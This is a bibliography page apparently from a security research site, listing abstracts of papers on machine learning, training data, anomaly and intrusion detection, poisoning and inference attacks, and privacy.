Visible to the public Biblio

Found 111 results

Filters: Keyword is Training data  [Clear All Filters]
2020-12-14
Deng, M., Wu, X., Feng, P., Zeng, W..  2020.  Sparse Support Vector Machine for Network Behavior Anomaly Detection. 2020 IEEE 8th International Conference on Information, Communication and Networks (ICICN). :199–204.
Network behavior anomaly detection (NBAD) require fast mechanisms for learning from the large scale data. However, the training velocity of general machine learning approach is largely limited by the adopted training weights of all features in the NBAD. In this paper, we notice, however, that the related weights matching of NBAD features is sparse, which is not necessary for holding all weights. Hence, in this paper, we consider an efficient support vector machine (SVM) approach for NBAD by imposing 1 -norm. Essentially, we propose to use sparse SVM (S-SVM), where sparsity in model, i.e. in weights is used to interfere with special feature selection and that can achieve feature selection and classification efficiently.
Habibi, G., Surantha, N..  2020.  XSS Attack Detection With Machine Learning and n-Gram Methods. 2020 International Conference on Information Management and Technology (ICIMTech). :516–520.

Cross-Site Scripting (XSS) is an attack most often carried out by attackers to attack a website by inserting malicious scripts into a website. This attack will take the user to a webpage that has been specifically designed to retrieve user sessions and cookies. Nearly 68% of websites are vulnerable to XSS attacks. In this study, the authors conducted a study by evaluating several machine learning methods, namely Support Vector Machine (SVM), K-Nearest Neighbour (KNN), and Naïve Bayes (NB). The machine learning algorithm is then equipped with the n-gram method to each script feature to improve the detection performance of XSS attacks. The simulation results show that the SVM and n-gram method achieves the highest accuracy with 98%.

2020-11-04
Zhang, J., Chen, J., Wu, D., Chen, B., Yu, S..  2019.  Poisoning Attack in Federated Learning using Generative Adversarial Nets. 2019 18th IEEE International Conference On Trust, Security And Privacy In Computing And Communications/13th IEEE International Conference On Big Data Science And Engineering (TrustCom/BigDataSE). :374—380.

Federated learning is a novel distributed learning framework, where the deep learning model is trained in a collaborative manner among thousands of participants. The shares between server and participants are only model parameters, which prevent the server from direct access to the private training data. However, we notice that the federated learning architecture is vulnerable to an active attack from insider participants, called poisoning attack, where the attacker can act as a benign participant in federated learning to upload the poisoned update to the server so that he can easily affect the performance of the global model. In this work, we study and evaluate a poisoning attack in federated learning system based on generative adversarial nets (GAN). That is, an attacker first acts as a benign participant and stealthily trains a GAN to mimic prototypical samples of the other participants' training set which does not belong to the attacker. Then these generated samples will be fully controlled by the attacker to generate the poisoning updates, and the global model will be compromised by the attacker with uploading the scaled poisoning updates to the server. In our evaluation, we show that the attacker in our construction can successfully generate samples of other benign participants using GAN and the global model performs more than 80% accuracy on both poisoning tasks and main tasks.

Liang, Y., He, D., Chen, D..  2019.  Poisoning Attack on Load Forecasting. 2019 IEEE Innovative Smart Grid Technologies - Asia (ISGT Asia). :1230—1235.

Short-term load forecasting systems for power grids have demonstrated high accuracy and have been widely employed for commercial use. However, classic load forecasting systems, which are based on statistical methods, are subject to vulnerability from training data poisoning. In this paper, we demonstrate a data poisoning strategy that effectively corrupts the forecasting model even in the presence of outlier detection. To the best of our knowledge, poisoning attack on short-term load forecasting with outlier detection has not been studied in previous works. Our method applies to several forecasting models, including the most widely-adapted and best-performing ones, such as multiple linear regression (MLR) and neural network (NN) models. Starting with the MLR model, we develop a novel closed-form solution to quickly estimate the new MLR model after a round of data poisoning without retraining. We then employ line search and simulated annealing to find the poisoning attack solution. Furthermore, we use the MLR attacking solution to generate a numerical solution for other models, such as NN. The effectiveness of our algorithm has been tested on the Global Energy Forecasting Competition (GEFCom2012) data set with the presence of outlier detection.

2020-09-28
Oya, Simon, Troncoso, Carmela, Pèrez-Gonzàlez, Fernando.  2019.  Rethinking Location Privacy for Unknown Mobility Behaviors. 2019 IEEE European Symposium on Security and Privacy (EuroS P). :416–431.
Location Privacy-Preserving Mechanisms (LPPMs) in the literature largely consider that users' data available for training wholly characterizes their mobility patterns. Thus, they hardwire this information in their designs and evaluate their privacy properties with these same data. In this paper, we aim to understand the impact of this decision on the level of privacy these LPPMs may offer in real life when the users' mobility data may be different from the data used in the design phase. Our results show that, in many cases, training data does not capture users' behavior accurately and, thus, the level of privacy provided by the LPPM is often overestimated. To address this gap between theory and practice, we propose to use blank-slate models for LPPM design. Contrary to the hardwired approach, that assumes known users' behavior, blank-slate models learn the users' behavior from the queries to the service provider. We leverage this blank-slate approach to develop a new family of LPPMs, that we call Profile Estimation-Based LPPMs. Using real data, we empirically show that our proposal outperforms optimal state-of-the-art mechanisms designed on sporadic hardwired models. On non-sporadic location privacy scenarios, our method is only better if the usage of the location privacy service is not continuous. It is our hope that eliminating the need to bootstrap the mechanisms with training data and ensuring that the mechanisms are lightweight and easy to compute help fostering the integration of location privacy protections in deployed systems.
2020-09-08
Isnan Imran, Muh. Ikhdar, Putrada, Aji Gautama, Abdurohman, Maman.  2019.  Detection of Near Field Communication (NFC) Relay Attack Anomalies in Electronic Payment Cases using Markov Chain. 2019 Fourth International Conference on Informatics and Computing (ICIC). :1–4.
Near Field Communication (NFC) is a short- range wireless communication technology that supports several features, one of which is an electronic payment. NFC works at a limited distance to exchange information. In terms of security, NFC technology has a gap for attackers to carry out attacks by forwarding information illegally using the target NFC network. A relay attack that occurs due to the theft of some data by an attacker by utilizing close communication from NFC is one of them. Relay attacks can cause a lot of loss in terms of material sacrifice. It takes countermeasures to overcome the problem of electronic payments with NFC technology. Detection of anomalous data is one way that can be done. In an attack, several abnormalities can be detected which can be used to prevent an attack. Markov Chain is one method that can be used to detect relay attacks that occur in electronic payments using NFC. The result shows Markov chain can detect anomalies in relay attacks in the case of electronic payment.
2020-09-04
Jing, Huiyun, Meng, Chengrui, He, Xin, Wei, Wei.  2019.  Black Box Explanation Guided Decision-Based Adversarial Attacks. 2019 IEEE 5th International Conference on Computer and Communications (ICCC). :1592—1596.
Adversarial attacks have been the hot research field in artificial intelligence security. Decision-based black-box adversarial attacks are much more appropriate in the real-world scenarios, where only the final decisions of the targeted deep neural networks are accessible. However, since there is no available guidance for searching the imperceptive adversarial perturbation, boundary attack, one of the best performing decision-based black-box attacks, carries out computationally expensive search. For improving attack efficiency, we propose a novel black box explanation guided decision-based black-box adversarial attack. Firstly, the problem of decision-based adversarial attacks is modeled as a derivative-free and constraint optimization problem. To solve this optimization problem, the black box explanation guided constrained random search method is proposed to more quickly find the imperceptible adversarial example. The insights into the targeted deep neural networks explored by the black box explanation are fully used to accelerate the computationally expensive random search. Experimental results demonstrate that our proposed attack improves the attack efficiency by 64% compared with boundary attack.
2020-08-10
Kwon, Hyun, Yoon, Hyunsoo, Park, Ki-Woong.  2019.  Selective Poisoning Attack on Deep Neural Network to Induce Fine-Grained Recognition Error. 2019 IEEE Second International Conference on Artificial Intelligence and Knowledge Engineering (AIKE). :136–139.

Deep neural networks (DNNs) provide good performance for image recognition, speech recognition, and pattern recognition. However, a poisoning attack is a serious threat to DNN's security. The poisoning attack is a method to reduce the accuracy of DNN by adding malicious training data during DNN training process. In some situations such as a military, it may be necessary to drop only a chosen class of accuracy in the model. For example, if an attacker does not allow only nuclear facilities to be selectively recognized, it may be necessary to intentionally prevent UAV from correctly recognizing nuclear-related facilities. In this paper, we propose a selective poisoning attack that reduces the accuracy of only chosen class in the model. The proposed method reduces the accuracy of a chosen class in the model by training malicious training data corresponding to a chosen class, while maintaining the accuracy of the remaining classes. For experiment, we used tensorflow as a machine learning library and MNIST and CIFAR10 as datasets. Experimental results show that the proposed method can reduce the accuracy of the chosen class to 43.2% and 55.3% in MNIST and CIFAR10, while maintaining the accuracy of the remaining classes.

2020-07-03
Cai, Guang-Wei, Fang, Zhi, Chen, Yue-Feng.  2019.  Estimating the Number of Hidden Nodes of the Single-Hidden-Layer Feedforward Neural Networks. 2019 15th International Conference on Computational Intelligence and Security (CIS). :172—176.

In order to solve the problem that there is no effective means to find the optimal number of hidden nodes of single-hidden-layer feedforward neural network, in this paper, a method will be introduced to solve it effectively by using singular value decomposition. First, the training data need to be normalized strictly by attribute-based data normalization and sample-based data normalization. Then, the normalized data is decomposed based on the singular value decomposition, and the number of hidden nodes is determined according to main eigenvalues. The experimental results of MNIST data set and APS data set show that the feedforward neural network can attain satisfactory performance in the classification task.

2020-06-22
Adesuyi, Tosin A., Kim, Byeong Man.  2019.  Preserving Privacy in Convolutional Neural Network: An ∊-tuple Differential Privacy Approach. 2019 IEEE 2nd International Conference on Knowledge Innovation and Invention (ICKII). :570–573.
Recent breakthrough in neural network has led to the birth of Convolutional neural network (CNN) which has been found to be very efficient especially in the areas of image recognition and classification. This success is traceable to the availability of large datasets and its capability to learn salient and complex data features which subsequently produce a reusable output model (Fθ). The Fθ are often made available (e.g. on cloud as-a-service) for others (client) to train their data or do transfer learning, however, an adversary can perpetrate a model inversion attack on the model Fθ to recover training data, hence compromising the sensitivity of the model buildup data. This is possible because CNN as a variant of deep neural network does memorize most of its training data during learning. Consequently, this has pose a privacy concern especially when a medical or financial data are used as model buildup data. Existing researches that proffers privacy preserving approach however suffer from significant accuracy degradation and this has left privacy preserving model on a theoretical desk. In this paper, we proposed an ϵ-tuple differential privacy approach that is based on neuron impact factor estimation to preserve privacy of CNN model without significant accuracy degradation. We experiment our approach on two large datasets and the result shows no significant accuracy degradation.
2020-06-12
Liu, Yujie, Su, Yixin, Ye, Xiaozhou, Qi, Yue.  2019.  Research on Extending Person Re-identification Datasets Based on Generative Adversarial Network. 2019 Chinese Automation Congress (CAC). :3280—3284.

Person re-identification(Person Re-ID) means that images of a pedestrian from cameras in a surveillance camera network can be automatically retrieved based on one of this pedestrian's image from another camera. The appearance change of pedestrians under different cameras poses a huge challenge to person re-identification. Person re-identification systems based on deep learning can effectively extract the appearance features of pedestrians. In this paper, the feature enhancement experiment is conducted, and the result showed that the current person reidentification datasets are relatively small and cannot fully meet the need of deep training. Therefore, this paper studied the method of using generative adversarial network to extend the person re-identification datasets and proposed a label smoothing regularization for outliers with weight (LSROW) algorithm to make full use of the generated data, effectively improved the accuracy of person re-identification.

2020-04-03
Song, Liwei, Shokri, Reza, Mittal, Prateek.  2019.  Membership Inference Attacks Against Adversarially Robust Deep Learning Models. 2019 IEEE Security and Privacy Workshops (SPW). :50—56.
In recent years, the research community has increasingly focused on understanding the security and privacy challenges posed by deep learning models. However, the security domain and the privacy domain have typically been considered separately. It is thus unclear whether the defense methods in one domain will have any unexpected impact on the other domain. In this paper, we take a step towards enhancing our understanding of deep learning models when the two domains are combined together. We do this by measuring the success of membership inference attacks against two state-of-the-art adversarial defense methods that mitigate evasion attacks: adversarial training and provable defense. On the one hand, membership inference attacks aim to infer an individual's participation in the target model's training dataset and are known to be correlated with target model's overfitting. On the other hand, adversarial defense methods aim to enhance the robustness of target models by ensuring that model predictions are unchanged for a small area around each sample in the training dataset. Intuitively, adversarial defenses may rely more on the training dataset and be more vulnerable to membership inference attacks. By performing empirical membership inference attacks on both adversarially robust models and corresponding undefended models, we find that the adversarial training method is indeed more susceptible to membership inference attacks, and the privacy leakage is directly correlated with model robustness. We also find that the provable defense approach does not lead to enhanced success of membership inference attacks. However, this is achieved by significantly sacrificing the accuracy of the model on benign data points, indicating that privacy, security, and prediction accuracy are not jointly achieved in these two approaches.
2020-03-02
Nozaki, Yusuke, Yoshikawa, Masaya.  2019.  Countermeasure of Lightweight Physical Unclonable Function Against Side-Channel Attack. 2019 Cybersecurity and Cyberforensics Conference (CCC). :30–34.

In industrial internet of things, various devices are connected to external internet. For the connected devices, the authentication is very important in the viewpoint of security; therefore, physical unclonable functions (PUFs) have attracted attention as authentication techniques. On the other hand, the risk of modeling attacks on PUFs, which clone the function of PUFs mathematically, is pointed out. Therefore, a resistant-PUF such as a lightweight PUF has been proposed. However, new analytical methods (side-channel attacks: SCAs), which use side-channel information such as power or electromagnetic waves, have been proposed. The countermeasure method has also been proposed; however, an evaluation using actual devices has not been studied. Since PUFs use small production variations, the implementation evaluation is very important. Therefore, this study proposes a SCA countermeasure of the lightweight PUF. The proposed method is based on the previous studies, and maintains power consumption consistency during the generation of response. In experiments using a field programmable gate array, the measured power consumption was constant regardless of output values of the PUF could be confirmed. Then, experimental results showed that the predicted rate of the response was about 50 %, and the proposed method had a tamper resistance against SCAs.

2020-02-26
Wang, Yuze, Han, Tao, Han, Xiaoxia, Liu, Peng.  2019.  Ensemble-Learning-Based Hardware Trojans Detection Method by Detecting the Trigger Nets. 2019 IEEE International Symposium on Circuits and Systems (ISCAS). :1–5.

With the globalization of integrated circuit (IC) design and manufacturing, malicious third-party vendors can easily insert hardware Trojans into their intellect property (IP) cores during IC design phase, threatening the security of IC systems. It is strongly required to develop hardware-Trojan detection methods especially for the IC design phase. As the particularity of Trigger nets in Trojan circuits, in this paper, we propose an ensemble-learning-based hardware-Trojan detection method by detecting the Trigger nets at the gate level. We extract the Trigger-net features for each net from known netlists and use the ensemble learning method to train two detection models according to the Trojan types. The detection models are used to identify suspicious Trigger nets in an unknown detected netlist and give results of suspiciousness values for each detected net. By flagging the top n% suspicious nets of each detection model as the suspicious Trigger nets based on the suspiciousness values, the proposed method can achieve, on average, 88% true positive rate, 90% true negative rate, and 90% Accuracy.

2020-02-18
Huang, Yonghong, Verma, Utkarsh, Fralick, Celeste, Infantec-Lopez, Gabriel, Kumar, Brajesh, Woodward, Carl.  2019.  Malware Evasion Attack and Defense. 2019 49th Annual IEEE/IFIP International Conference on Dependable Systems and Networks Workshops (DSN-W). :34–38.

Machine learning (ML) classifiers are vulnerable to adversarial examples. An adversarial example is an input sample which is slightly modified to induce misclassification in an ML classifier. In this work, we investigate white-box and grey-box evasion attacks to an ML-based malware detector and conduct performance evaluations in a real-world setting. We compare the defense approaches in mitigating the attacks. We propose a framework for deploying grey-box and black-box attacks to malware detection systems.

Nasr, Milad, Shokri, Reza, Houmansadr, Amir.  2019.  Comprehensive Privacy Analysis of Deep Learning: Passive and Active White-Box Inference Attacks against Centralized and Federated Learning. 2019 IEEE Symposium on Security and Privacy (SP). :739–753.

Deep neural networks are susceptible to various inference attacks as they remember information about their training data. We design white-box inference attacks to perform a comprehensive privacy analysis of deep learning models. We measure the privacy leakage through parameters of fully trained models as well as the parameter updates of models during training. We design inference algorithms for both centralized and federated learning, with respect to passive and active inference attackers, and assuming different adversary prior knowledge. We evaluate our novel white-box membership inference attacks against deep learning algorithms to trace their training data records. We show that a straightforward extension of the known black-box attacks to the white-box setting (through analyzing the outputs of activation functions) is ineffective. We therefore design new algorithms tailored to the white-box setting by exploiting the privacy vulnerabilities of the stochastic gradient descent algorithm, which is the algorithm used to train deep neural networks. We investigate the reasons why deep learning models may leak information about their training data. We then show that even well-generalized models are significantly susceptible to white-box membership inference attacks, by analyzing state-of-the-art pre-trained and publicly available models for the CIFAR dataset. We also show how adversarial participants, in the federated learning setting, can successfully run active membership inference attacks against other participants, even when the global model achieves high prediction accuracies.

2019-11-25
Zuin, Gianlucca, Chaimowicz, Luiz, Veloso, Adriano.  2018.  Learning Transferable Features For Open-Domain Question Answering. 2018 International Joint Conference on Neural Networks (IJCNN). :1–8.

Corpora used to learn open-domain Question-Answering (QA) models are typically collected from a wide variety of topics or domains. Since QA requires understanding natural language, open-domain QA models generally need very large training corpora. A simple way to alleviate data demand is to restrict the domain covered by the QA model, leading thus to domain-specific QA models. While learning improved QA models for a specific domain is still challenging due to the lack of sufficient training data in the topic of interest, additional training data can be obtained from related topic domains. Thus, instead of learning a single open-domain QA model, we investigate domain adaptation approaches in order to create multiple improved domain-specific QA models. We demonstrate that this can be achieved by stratifying the source dataset, without the need of searching for complementary data unlike many other domain adaptation approaches. We propose a deep architecture that jointly exploits convolutional and recurrent networks for learning domain-specific features while transferring domain-shared features. That is, we use transferable features to enable model adaptation from multiple source domains. We consider different transference approaches designed to learn span-level and sentence-level QA models. We found that domain-adaptation greatly improves sentence-level QA performance, and span-level QA benefits from sentence information. Finally, we also show that a simple clustering algorithm may be employed when the topic domains are unknown and the resulting loss in accuracy is negligible.

2019-05-01
Li, P., Liu, Q., Zhao, W., Wang, D., Wang, S..  2018.  Chronic Poisoning against Machine Learning Based IDSs Using Edge Pattern Detection. 2018 IEEE International Conference on Communications (ICC). :1-7.

In big data era, machine learning is one of fundamental techniques in intrusion detection systems (IDSs). Poisoning attack, which is one of the most recognized security threats towards machine learning- based IDSs, injects some adversarial samples into the training phase, inducing data drifting of training data and a significant performance decrease of target IDSs over testing data. In this paper, we adopt the Edge Pattern Detection (EPD) algorithm to design a novel poisoning method that attack against several machine learning algorithms used in IDSs. Specifically, we propose a boundary pattern detection algorithm to efficiently generate the points that are near to abnormal data but considered to be normal ones by current classifiers. Then, we introduce a Batch-EPD Boundary Pattern (BEBP) detection algorithm to overcome the limitation of the number of edge pattern points generated by EPD and to obtain more useful adversarial samples. Based on BEBP, we further present a moderate but effective poisoning method called chronic poisoning attack. Extensive experiments on synthetic and three real network data sets demonstrate the performance of the proposed poisoning method against several well-known machine learning algorithms and a practical intrusion detection method named FMIFS-LSSVM-IDS.

2019-03-22
Duan, J., Zeng, Z., Oprea, A., Vasudevan, S..  2018.  Automated Generation and Selection of Interpretable Features for Enterprise Security. 2018 IEEE International Conference on Big Data (Big Data). :1258-1265.

We present an effective machine learning method for malicious activity detection in enterprise security logs. Our method involves feature engineering, or generating new features by applying operators on features of the raw data. We generate DNF formulas from raw features, extract Boolean functions from them, and leverage Fourier analysis to generate new parity features and rank them based on their highest Fourier coefficients. We demonstrate on real enterprise data sets that the engineered features enhance the performance of a wide range of classifiers and clustering algorithms. As compared to classification of raw data features, the engineered features achieve up to 50.6% improvement in malicious recall, while sacrificing no more than 0.47% in accuracy. We also observe better isolation of malicious clusters, when performing clustering on engineered features. In general, a small number of engineered features achieve higher performance than raw data features according to our metrics of interest. Our feature engineering method also retains interpretability, an important consideration in cyber security applications.

2018-06-07
Lodeiro-Santiago, Moisés, Caballero-Gil, Cándido, Caballero-Gil, Pino.  2017.  Collaborative SQL-injections Detection System with Machine Learning. Proceedings of the 1st International Conference on Internet of Things and Machine Learning. :45:1–45:5.
Data mining and information extraction from data is a field that has gained relevance in recent years thanks to techniques based on artificial intelligence and use of machine and deep learning. The main aim of the present work is the development of a tool based on a previous behaviour study of security audit tools (oriented to SQL pentesting) with the purpose of creating testing sets capable of performing an accurate detection of a SQL attack. The study is based on the information collected through the generated web server logs in a pentesting laboratory environment. Then, making use of the common extracted patterns from the logs, each attack vector has been classified in risk levels (dangerous attack, normal attack, non-attack, etc.). Finally, a training with the generated data was performed in order to obtain a classifier system that has a variable performance between 97 and 99 percent in positive attack detection. The training data is shared to other servers in order to create a distributed network capable of deciding if a query is an attack or is a real petition and inform to connected clients in order to block the petitions from the attacker's IP.
2018-05-01
Tran, D. T., Waris, M. A., Gabbouj, M., Iosifidis, A..  2017.  Sample-Based Regularization for Support Vector Machine Classification. 2017 Seventh International Conference on Image Processing Theory, Tools and Applications (IPTA). :1–6.

In this paper, we propose a new regularization scheme for the well-known Support Vector Machine (SVM) classifier that operates on the training sample level. The proposed approach is motivated by the fact that Maximum Margin-based classification defines decision functions as a linear combination of the selected training data and, thus, the variations on training sample selection directly affect generalization performance. We show that the exploitation of the proposed regularization scheme is well motivated and intuitive. Experimental results show that the proposed regularization scheme outperforms standard SVM in human action recognition tasks as well as classical recognition problems.

Kong, L., Huang, G., Wu, K..  2017.  Identification of Abnormal Network Traffic Using Support Vector Machine. 2017 18th International Conference on Parallel and Distributed Computing, Applications and Technologies (PDCAT). :288–292.

Network traffic identification has been a hot topic in network security area. The identification of abnormal traffic can detect attack traffic and helps network manager enforce corresponding security policies to prevent attacks. Support Vector Machines (SVMs) are one of the most promising supervised machine learning (ML) algorithms that can be applied to the identification of traffic in IP networks as well as detection of abnormal traffic. SVM shows better performance because it can avoid local optimization problems existed in many supervised learning algorithms. However, as a binary classification approach, SVM needs more research in multiclass classification. In this paper, we proposed an abnormal traffic identification system(ATIS) that can classify and identify multiple attack traffic applications. Each component of ATIS is introduced in detail and experiments are carried out based on ATIS. Through the test of KDD CUP dataset, SVM shows good performance. Furthermore, the comparison of experiments reveals that scaling and parameters has a vital impact on SVM training results.

2018-04-11
Gebhardt, D., Parikh, K., Dzieciuch, I., Walton, M., Hoang, N. A. V..  2017.  Hunting for Naval Mines with Deep Neural Networks. OCEANS 2017 - Anchorage. :1–5.

Explosive naval mines pose a threat to ocean and sea faring vessels, both military and civilian. This work applies deep neural network (DNN) methods to the problem of detecting minelike objects (MLO) on the seafloor in side-scan sonar imagery. We explored how the DNN depth, memory requirements, calculation requirements, and training data distribution affect detection efficacy. A visualization technique (class activation map) was incorporated that aids a user in interpreting the model's behavior. We found that modest DNN model sizes yielded better accuracy (98%) than very simple DNN models (93%) and a support vector machine (78%). The largest DNN models achieved textless;1% efficacy increase at a cost of a 17x increase of trainable parameter count and computation requirements. In contrast to DNNs popularized for many-class image recognition tasks, the models for this task require far fewer computational resources (0.3% of parameters), and are suitable for embedded use within an autonomous unmanned underwater vehicle.

2018-04-02
Essra, A., Sitompul, O. S., Nasution, B. Benyamin, Rahmat, R. F..  2017.  Hierarchical Graph Neuron Scheme in Classifying Intrusion Attack. 2017 4th International Conference on Computer Applications and Information Processing Technology (CAIPT). :1–6.

Hierarchical Graph Neuron (HGN) is an extension of network-centric algorithm called Graph Neuron (GN), which is used to perform parallel distributed pattern recognition. In this research, HGN scheme is used to classify intrusion attacks in computer networks. Patterns of intrusion attacks are preprocessed in three steps: selecting attributes using information gain attribute evaluation, discretizing the selected attributes using entropy-based discretization supervised method, and selecting the training data using K-Means clustering algorithm. After the preprocessing stage, the HGN scheme is then deployed to classify intrusion attack using the KDD Cup 99 dataset. The results of the classification are measured in terms of accuracy rate, detection rate, false positive rate and true negative rate. The test result shows that the HGN scheme is promising and stable in classifying the intrusion attack patterns with accuracy rate reaches 96.27%, detection rate reaches 99.20%, true negative rate below 15.73%, and false positive rate as low as 0.80%.

2018-02-14
Stubbs, J. J., Birch, G. C., Woo, B. L., Kouhestani, C. G..  2017.  Physical security assessment with convolutional neural network transfer learning. 2017 International Carnahan Conference on Security Technology (ICCST). :1–6.

Deep learning techniques have demonstrated the ability to perform a variety of object recognition tasks using visible imager data; however, deep learning has not been implemented as a means to autonomously detect and assess targets of interest in a physical security system. We demonstrate the use of transfer learning on a convolutional neural network (CNN) to significantly reduce training time while keeping detection accuracy of physical security relevant targets high. Unlike many detection algorithms employed by video analytics within physical security systems, this method does not rely on temporal data to construct a background scene; targets of interest can halt motion indefinitely and still be detected by the implemented CNN. A key advantage of using deep learning is the ability for a network to improve over time. Periodic retraining can lead to better detection and higher confidence rates. We investigate training data size versus CNN test accuracy using physical security video data. Due to the large number of visible imagers, significant volume of data collected daily, and currently deployed human in the loop ground truth data, physical security systems present a unique environment that is well suited for analysis via CNNs. This could lead to the creation of algorithmic element that reduces human burden and decreases human analyzed nuisance alarms.